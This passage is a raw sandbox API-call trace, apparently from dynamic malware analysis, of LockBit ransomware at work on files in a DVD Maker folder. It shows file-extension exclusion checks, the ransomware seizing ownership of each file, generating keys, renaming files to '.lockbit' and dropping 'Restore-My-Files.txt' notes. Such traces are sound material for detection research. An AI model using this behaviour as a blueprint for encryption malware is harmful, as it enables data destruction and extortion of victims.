(lpString1="bootsect.bak", lpString2="SceneButtonInset_Alpha2.png") returned -1 [0088.477] lstrcmpiW (lpString1="autorun.inf", lpString2="SceneButtonInset_Alpha2.png") returned -1 [0088.558] lstrcmpiW (lpString1="thumbs.db", lpString2="SceneButtonInset_Alpha2.png") returned 1 [0088.558] lstrcmpiW (lpString1="iconcache.db", lpString2="SceneButtonInset_Alpha2.png") returned -1 [0088.558] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0088.558] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png") returned=".png" [0088.558] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.558] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.559] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.559] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.559] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.559] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.560] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.560] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.560] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.560] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.560] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.560] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.560] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.560] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.562] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.562] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.562] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.562] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.603] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.603] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.603] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.603] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.603] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.603] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.604] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.604] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.604] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.604] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.604] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png.lockbit") returned 87 [0088.604] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.611] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.613] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.613] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.613] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.615] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.616] RtlFreeAnsiString (AnsiString="\\") [0088.616] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0088.616] malloc (_Size=0x200) returned 0x77d800 [0088.616] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.616] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.616] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.616] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.623] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.626] CloseHandle (hObject=0x3c4) returned 1 [0088.626] free (_Block=0x77d800) [0088.626] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0088.627] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.627] malloc (_Size=0x40068) returned 0x3d70048 [0088.627] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3518) returned 1 [0088.628] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0088.640] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.641] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0088.642] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0088.652] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.652] malloc (_Size=0xc4) returned 0x1ff1e60 [0088.652] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0088.655] free (_Block=0x1ff1e60) [0088.658] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0088.664] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0088.664] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.664] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e8721b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71e8721b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SceneButtonSubpicture.png", cAlternateFileName="")) returned 1 [0088.664] lstrcmpiW (lpString1=".", lpString2="SceneButtonSubpicture.png") returned -1 [0088.665] lstrcmpiW (lpString1="..", lpString2="SceneButtonSubpicture.png") returned -1 [0088.665] PathFindExtensionW (pszPath="SceneButtonSubpicture.png") returned=".png" [0088.665] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.665] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.665] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.665] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.666] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.666] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.666] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.666] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.666] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.666] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.666] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.666] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.666] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.666] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.668] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.668] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.668] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.668] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.668] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.668] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.668] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.670] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.670] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.670] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.670] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.670] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.670] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.670] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.671] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.671] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.671] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.671] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.671] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.671] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.671] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.671] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SceneButtonSubpicture.png") returned -1 [0088.671] lstrcmpiW (lpString1="ntldr", lpString2="SceneButtonSubpicture.png") returned -1 [0088.671] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SceneButtonSubpicture.png") returned -1 [0088.671] lstrcmpiW (lpString1="bootsect.bak", lpString2="SceneButtonSubpicture.png") returned -1 [0088.671] lstrcmpiW (lpString1="autorun.inf", lpString2="SceneButtonSubpicture.png") returned -1 [0088.671] lstrcmpiW (lpString1="thumbs.db", lpString2="SceneButtonSubpicture.png") returned 1 [0088.671] lstrcmpiW (lpString1="iconcache.db", lpString2="SceneButtonSubpicture.png") returned -1 [0088.671] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0088.672] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png") returned=".png" [0088.672] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.672] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.672] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.672] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.672] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.672] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.672] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.672] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.672] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.672] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.672] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.672] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.682] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.682] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.682] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.682] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.682] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.682] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.682] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.683] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.683] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.683] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.683] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.684] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.684] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.684] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.684] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.684] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.684] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png.lockbit") returned 85 [0088.711] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.713] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.714] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.714] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.714] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.716] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.719] RtlFreeAnsiString (AnsiString="\\") [0088.719] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0088.719] malloc (_Size=0x200) returned 0x77d800 [0088.745] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.746] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.746] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.746] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.753] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.766] CloseHandle (hObject=0x3b8) returned 1 [0088.766] free (_Block=0x77d800) [0088.767] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0088.767] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.767] malloc (_Size=0x40068) returned 0x1ff1e60 [0088.768] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3119) returned 1 [0088.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0088.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0088.770] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0088.779] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.779] malloc (_Size=0xc0) returned 0x77d800 [0088.779] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0088.780] free (_Block=0x77d800) [0088.780] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0088.780] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0088.780] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.780] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71893b93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71893b93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x500e57b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x539540, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainBackground.wmv", cAlternateFileName="")) returned 1 [0088.780] lstrcmpiW (lpString1=".", lpString2="SportsMainBackground.wmv") returned -1 [0088.780] lstrcmpiW (lpString1="..", lpString2="SportsMainBackground.wmv") returned -1 [0088.780] PathFindExtensionW (pszPath="SportsMainBackground.wmv") returned=".wmv" [0088.780] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0088.780] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0088.780] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0088.780] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0088.781] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0088.782] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0088.782] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SportsMainBackground.wmv") returned -1 [0088.783] lstrcmpiW (lpString1="ntldr", lpString2="SportsMainBackground.wmv") returned -1 [0088.783] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SportsMainBackground.wmv") returned -1 [0088.783] lstrcmpiW (lpString1="bootsect.bak", lpString2="SportsMainBackground.wmv") returned -1 [0088.783] lstrcmpiW (lpString1="autorun.inf", lpString2="SportsMainBackground.wmv") returned -1 [0088.783] lstrcmpiW (lpString1="thumbs.db", lpString2="SportsMainBackground.wmv") returned 1 [0088.783] lstrcmpiW (lpString1="iconcache.db", lpString2="SportsMainBackground.wmv") returned -1 [0088.783] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0088.783] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned=".wmv" [0088.783] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0088.783] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0088.783] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0088.783] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0088.783] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0088.783] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0088.783] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0088.783] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0088.783] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0088.783] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0088.783] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0088.783] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0088.784] 